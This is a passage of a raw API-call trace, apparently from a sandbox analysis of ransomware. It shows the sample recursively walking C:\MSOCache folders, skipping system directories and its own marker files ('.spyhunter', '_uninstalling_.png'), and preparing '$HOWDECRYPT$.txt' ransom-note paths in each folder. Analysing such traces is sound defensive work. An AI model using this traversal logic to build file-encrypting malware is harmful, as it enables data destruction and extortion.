GetProcessHeap () returned 0x2c0000 [0082.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3280a8 [0082.057] GetProcessHeap () returned 0x2c0000 [0082.057] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b0) returned 0x334f38 [0082.057] GetProcessHeap () returned 0x2c0000 [0082.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0082.058] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0082.058] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0082.058] lstrlenW (lpString="Windows") returned 7 [0082.058] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0082.058] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.058] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0082.058] lstrlenW (lpString="System Volume Information") returned 25 [0082.058] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 66 [0082.058] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.058] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.058] GetProcessHeap () returned 0x2c0000 [0082.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0082.058] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned 68 [0082.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0082.937] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0082.937] lstrlenW (lpString="Windows") returned 7 [0082.937] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0082.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.937] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0082.937] lstrlenW (lpString="System Volume Information") returned 25 [0082.937] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0082.937] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.937] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0082.938] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.938] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0082.938] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0082.938] GetProcessHeap () returned 0x2c0000 [0082.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x323708 [0082.938] GetProcessHeap () returned 0x2c0000 [0082.938] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x490) returned 0x334f38 [0082.938] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.938] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0082.938] lstrlenW (lpString="Windows") returned 7 [0082.938] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0082.938] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.938] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0082.938] lstrlenW (lpString="System Volume Information") returned 25 [0082.938] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0082.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.938] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0082.939] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.939] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0082.939] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0082.939] GetProcessHeap () returned 0x2c0000 [0082.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x3237e0 [0082.939] GetProcessHeap () returned 0x2c0000 [0082.939] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x498) returned 0x334f38 [0082.939] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.939] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Windows") returned -1 [0082.939] lstrlenW (lpString="Windows") returned 7 [0082.939] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="$Recycle.bin") returned 1 [0082.939] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.939] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="System Volume Information") returned -1 [0082.939] lstrlenW (lpString="System Volume Information") returned 25 [0082.939] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0082.939] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".spyhunter") returned 0x0 [0082.939] lstrcmpW (lpString1="GrooveLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.939] lstrcmpW (lpString1="GrooveLR.cab", lpString2="_uninstalling_.png") returned 1 [0082.939] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0082.939] GetProcessHeap () returned 0x2c0000 [0082.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3266e8 [0082.939] GetProcessHeap () returned 0x2c0000 [0082.939] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4a0) returned 0x334f38 [0082.939] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.939] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Windows") returned -1 [0082.939] lstrlenW (lpString="Windows") returned 7 [0082.939] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="$Recycle.bin") returned 1 [0082.939] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.939] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="System Volume Information") returned -1 [0082.940] lstrlenW (lpString="System Volume Information") returned 25 [0082.940] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0082.940] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".spyhunter") returned 0x0 [0082.940] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.940] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="_uninstalling_.png") returned 1 [0082.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0082.940] GetProcessHeap () returned 0x2c0000 [0082.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x327fb8 [0082.940] GetProcessHeap () returned 0x2c0000 [0082.940] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4a8) returned 0x334f38 [0082.940] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.940] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Windows") returned -1 [0082.940] lstrlenW (lpString="Windows") returned 7 [0082.940] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="$Recycle.bin") returned 1 [0082.940] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.940] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="System Volume Information") returned -1 [0082.940] lstrlenW (lpString="System Volume Information") returned 25 [0082.940] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0082.940] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".spyhunter") returned 0x0 [0082.940] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.940] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="_uninstalling_.png") returned 1 [0082.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0082.940] GetProcessHeap () returned 0x2c0000 [0082.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x327dd8 [0082.940] GetProcessHeap () returned 0x2c0000 [0082.940] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b0) returned 0x334f38 [0082.940] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.940] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0082.940] lstrlenW (lpString="Windows") returned 7 [0082.941] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0082.941] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.941] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0082.941] lstrlenW (lpString="System Volume Information") returned 25 [0082.941] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.941] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0082.941] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.941] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0082.941] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.941] GetProcessHeap () returned 0x2c0000 [0082.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326518 [0082.941] GetProcessHeap () returned 0x2c0000 [0082.941] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b8) returned 0x334f38 [0082.941] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0082.941] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0082.942] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0082.942] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0082.942] GetProcessHeap () returned 0x2c0000 [0082.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3280a8 [0082.942] GetProcessHeap () returned 0x2c0000 [0082.942] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4c0) returned 0x334f38 [0082.942] GetProcessHeap () returned 0x2c0000 [0082.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0082.942] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0082.942] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0082.942] lstrlenW (lpString="Windows") returned 7 [0082.943] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0082.943] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.943] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0082.943] lstrlenW (lpString="System Volume Information") returned 25 [0082.943] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 66 [0082.943] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.943] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.943] GetProcessHeap () returned 0x2c0000 [0082.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0082.943] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned 68 [0082.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0083.535] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.535] lstrlenW (lpString="Windows") returned 7 [0083.535] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.535] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.535] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.535] lstrlenW (lpString="System Volume Information") returned 25 [0083.535] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0083.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.535] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0083.535] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.535] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0083.536] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0083.536] GetProcessHeap () returned 0x2c0000 [0083.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x3238b8 [0083.536] GetProcessHeap () returned 0x2c0000 [0083.536] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b8) returned 0x334f38 [0083.536] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.536] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.536] lstrlenW (lpString="Windows") returned 7 [0083.536] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.536] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.536] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.536] lstrlenW (lpString="System Volume Information") returned 25 [0083.536] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0083.536] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.536] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.536] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0083.536] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.536] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0083.536] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0083.536] GetProcessHeap () returned 0x2c0000 [0083.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323990 [0083.536] GetProcessHeap () returned 0x2c0000 [0083.536] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4c0) returned 0x334f38 [0083.536] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.536] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0083.536] lstrlenW (lpString="Windows") returned 7 [0083.536] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0083.537] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.537] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0083.537] lstrlenW (lpString="System Volume Information") returned 25 [0083.537] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 71 [0083.537] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0083.537] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0083.537] GetProcessHeap () returned 0x2c0000 [0083.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.537] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned 73 [0083.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335ee0 [0083.546] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.546] lstrlenW (lpString="Windows") returned 7 [0083.546] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.546] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.546] lstrlenW (lpString="System Volume Information") returned 25 [0083.546] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.") returned 73 [0083.546] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.546] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0083.546] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.546] lstrlenW (lpString="Windows") returned 7 [0083.546] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.546] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.546] lstrlenW (lpString="System Volume Information") returned 25 [0083.546] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\..") returned 74 [0083.546] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.546] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.546] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0083.546] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Windows") returned -1 [0083.546] lstrlenW (lpString="Windows") returned 7 [0083.547] lstrcmpiW (lpString1="dwintl20.dll", lpString2="$Recycle.bin") returned 1 [0083.547] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.547] lstrcmpiW (lpString1="dwintl20.dll", lpString2="System Volume Information") returned -1 [0083.547] lstrlenW (lpString="System Volume Information") returned 25 [0083.547] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0083.547] StrStrIW (lpFirst="dwintl20.dll", lpSrch=".spyhunter") returned 0x0 [0083.547] lstrcmpW (lpString1="dwintl20.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.547] lstrcmpW (lpString1="dwintl20.dll", lpString2="_uninstalling_.png") returned 1 [0083.547] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0083.547] GetProcessHeap () returned 0x2c0000 [0083.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x320868 [0083.547] GetProcessHeap () returned 0x2c0000 [0083.547] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b0) returned 0x334f38 [0083.547] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0083.547] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0083.548] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\$HOWDECRYPT$.txt") returned 88 [0083.548] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\$HOWDECRYPT$.txt") returned 88 [0083.548] GetProcessHeap () returned 0x2c0000 [0083.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x3353f0 [0083.548] GetProcessHeap () returned 0x2c0000 [0083.548] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4b8) returned 0x32f610 [0083.548] GetProcessHeap () returned 0x2c0000 [0083.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0083.549] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.549] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0083.549] lstrlenW (lpString="Windows") returned 7 [0083.549] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0083.549] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.549] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0083.549] lstrlenW (lpString="System Volume Information") returned 25 [0083.549] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0083.549] StrStrIW (lpFirst="branding.xml", lpSrch=".spyhunter") returned 0x0 [0083.549] lstrcmpW (lpString1="branding.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.549] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0083.549] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0083.549] GetProcessHeap () returned 0x2c0000 [0083.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326518 [0083.549] GetProcessHeap () returned 0x2c0000 [0083.549] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4c0) returned 0x32f610 [0083.549] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.549] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0083.549] lstrlenW (lpString="Windows") returned 7 [0083.549] lstrcmpiW (lpString1="DW20.EXE", lpString2="$Recycle.bin") returned 1 [0083.549] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.549] lstrcmpiW (lpString1="DW20.EXE", lpString2="System Volume Information") returned -1 [0083.549] lstrlenW (lpString="System Volume Information") returned 25 [0083.549] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0083.549] StrStrIW (lpFirst="DW20.EXE", lpSrch=".spyhunter") returned 0x0 [0083.549] lstrcmpW (lpString1="DW20.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.549] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0083.549] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0083.550] GetProcessHeap () returned 0x2c0000 [0083.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3204a8 [0083.550] GetProcessHeap () returned 0x2c0000 [0083.550] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4c8) returned 0x32f610 [0083.550] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.550] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Windows") returned -1 [0083.550] lstrlenW (lpString="Windows") returned 7 [0083.550] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="$Recycle.bin") returned 1 [0083.550] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.550] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="System Volume Information") returned -1 [0083.550] lstrlenW (lpString="System Volume Information") returned 25 [0083.550] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0083.550] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".spyhunter") returned 0x0 [0083.550] lstrcmpW (lpString1="dwdcw20.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.550] lstrcmpW (lpString1="dwdcw20.dll", lpString2="_uninstalling_.png") returned 1 [0083.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0083.550] GetProcessHeap () returned 0x2c0000 [0083.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3267d0 [0083.550] GetProcessHeap () returned 0x2c0000 [0083.550] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4d0) returned 0x32f610 [0083.550] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.550] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Windows") returned -1 [0083.550] lstrlenW (lpString="Windows") returned 7 [0083.550] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="$Recycle.bin") returned 1 [0083.550] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.550] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="System Volume Information") returned -1 [0083.550] lstrlenW (lpString="System Volume Information") returned 25 [0083.550] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0083.550] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".spyhunter") returned 0x0 [0083.550] lstrcmpW (lpString1="dwtrig20.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.551] lstrcmpW (lpString1="dwtrig20.exe", lpString2="_uninstalling_.png") returned 1 [0083.551] lstrlenW 